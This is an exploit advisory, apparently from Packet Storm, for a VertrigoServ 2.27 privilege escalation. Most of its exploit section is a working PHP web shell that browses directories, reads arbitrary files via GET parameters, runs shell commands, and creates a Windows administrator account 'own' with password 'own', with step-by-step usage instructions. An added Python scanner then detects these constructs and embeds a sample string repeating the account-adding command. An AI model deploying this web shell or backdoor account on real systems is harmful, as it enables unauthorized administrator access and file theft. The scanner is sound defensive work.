
Vertrigoserv 2.27 Privilege Escalation

Date: 19 May 2012
Reported by: X-Cisadane
Type: packetstorm
Source: packetstormsecurity.com

Vertrigoserv 2.27 Local Privilege Escalation Exploit. The exploit allows unauthorized users to gain administrator privileges.

Code
`=====================================================  
Vertrigoserv 2.27 Local Privilege Escalation Exploit  
====================================================  
  
:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------:  
: # Exploit Title : Vertrigoserv 2.27 Local Privilege Escalation Exploit  
: # Date : May 19th 2012  
: # Author : X-Cisadane  
: # Software Link : http://vertrigo.sourceforge.net/  
: # Version : 2.27  
: # Category : Desktop (Windows) Applications  
: # Platform : Win32  
: # Vulnerability : Local Privilege Escalation Exploit  
: # Tested On : Windows XP Professional Service Pack 3  
: # Greetz to : Inphex, X-Code, Borneo Crew, Depok Cyber, Dunia Santai,  
Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari  
:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------:  
  
Proof Of Concept :  
================  
[ENGLISH]  
1. Run VertrigoServ  
2. Create a file named script.php in X:\VertrigoServ Installation Directory\www\  
3. Fill script.php with this script & save!  
<?php  
//I'm using code from Inphex (inphex0 at googlemail.com)  
//Copyrighted (C) Inphex  
error_reporting(E_ALL ^ E_NOTICE);  
$qQa = ($_GET['qmB'] == "")?"./":$_GET['qmB'];  
$qQd = opendir($qQa);  
  
if (isset($_GET['qrF']))  
{  
$qrX = fopen($_GET['qrF'],"r");  
echo fread($qrX,50000);  
exit;  
} elseif(isset($_GET['qQx'])) { exec("net user own own /add & net  
localgroup Administrators own /add"); echo "User own -> full privileges  
successfully added";exit;}  
echo "<textarea rows=40 cols=80  
style='position:absolute;margin-left:390;'>";  
echo htmlspecialchars(shell_exec("cd ".$qQa." & dir"));  
echo "</textarea>";  
while (false !== ($qQr = readdir($qQd))){  
  
switch(filetype($qQa.$qQr))  
{  
case "dir":  
echo "<a  
href=?qmB=".urlencode(htmlspecialchars(realpath($qQa.$qQr)))."/>".htmlspecialchars($qQr)."</a><br>";  
break;  
case "file":  
echo "<a  
href=?qrF=".urlencode(htmlspecialchars(realpath($qQa.$qQr))).">".htmlspecialchars($qQr)."</a><br>";  
break;  
}  
}  
?>  
  
4. Open your browser & go to http://localhost/script.php?qQx  
5. If successful, it will show this message: User own -> full privileges successfully added  
6. Now open Command Prompt, type Net User and press Enter. It will show a new user (own) & the password is own.  
  
[INDONESIAN]  
1. Run VertrigoServ  
2. Create a file named script.php in X:\VertrigoServ installation directory\www\  
3. Fill the script.php file with the following script & save!  
4. Open your browser and go to http://localhost/script.php?qQx  
5. If successful, this message will appear: User own -> full privileges successfully added  
6. Now open Command Prompt, type Net User and press Enter! A new user named own with the password own will then appear  
`
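
The PoC depends on a PHP file in the web root that runs account-management commands. The Python scanner below is an added example, not part of the original advisory or of VertrigoServ, and flags the constructs that script uses across a directory tree. The rule names, the sample strings, the `demo` account name and the `uploads` layout are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path

# Rules derived from constructs visible in the PoC listing. \s+ also matches a
# newline, so the command wrapped across two lines in the listing is caught.
RULES = {
    "command-exec": re.compile(
        r"\b(?:exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.I),
    "account-add": re.compile(r"net\s+user\s+\S+(?:\s+\S+)?\s+/add", re.I),
    "admin-group-add": re.compile(
        r"net\s+localgroup\s+administrators\s+\S+\s+/add", re.I),
    "request-to-file-open": re.compile(
        r"\b(?:fopen|opendir|readfile|file_get_contents)\s*\(\s*"
        r"\$_(?:GET|POST|REQUEST)\b", re.I),
}
HIGH = {"account-add", "admin-group-add"}  # account changes from a web script

# Constructed samples (not taken from a real site); "demo" is a placeholder.
SAMPLE_BENIGN = '<?php echo htmlspecialchars($_GET["name"] ?? ""); ?>'
SAMPLE_SUSPICIOUS = ('<?php if (isset($_GET["x"])) { exec("net user demo demo '
                     '/add & net\nlocalgroup Administrators demo /add"); } ?>')

def scan_text(source):
    """Return the sorted names of the rules that match one PHP source string."""
    return sorted(name for name, rx in RULES.items() if rx.search(source))

def scan_webroot(root):
    """Map each flagged *.php file (path relative to root) to (severity, rules)."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            severity = "high" if HIGH.intersection(hits) else "review"
            findings[path.relative_to(root).as_posix()] = (severity, hits)
    return findings

def demo():
    """Build a throwaway web root holding both samples and scan it."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_text(SAMPLE_BENIGN, encoding="utf-8")
        Path(root, "uploads").mkdir()
        Path(root, "uploads", "script.php").write_text(
            SAMPLE_SUSPICIOUS, encoding="utf-8")
        return scan_webroot(root)

if __name__ == "__main__":
    for name, (severity, rules) in demo().items():
        print(f"{severity:6} {name}: {', '.join(rules)}")
```

A `review` finding only means a command-execution or request-driven file call exists and needs a human look; legitimate applications use those functions too.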
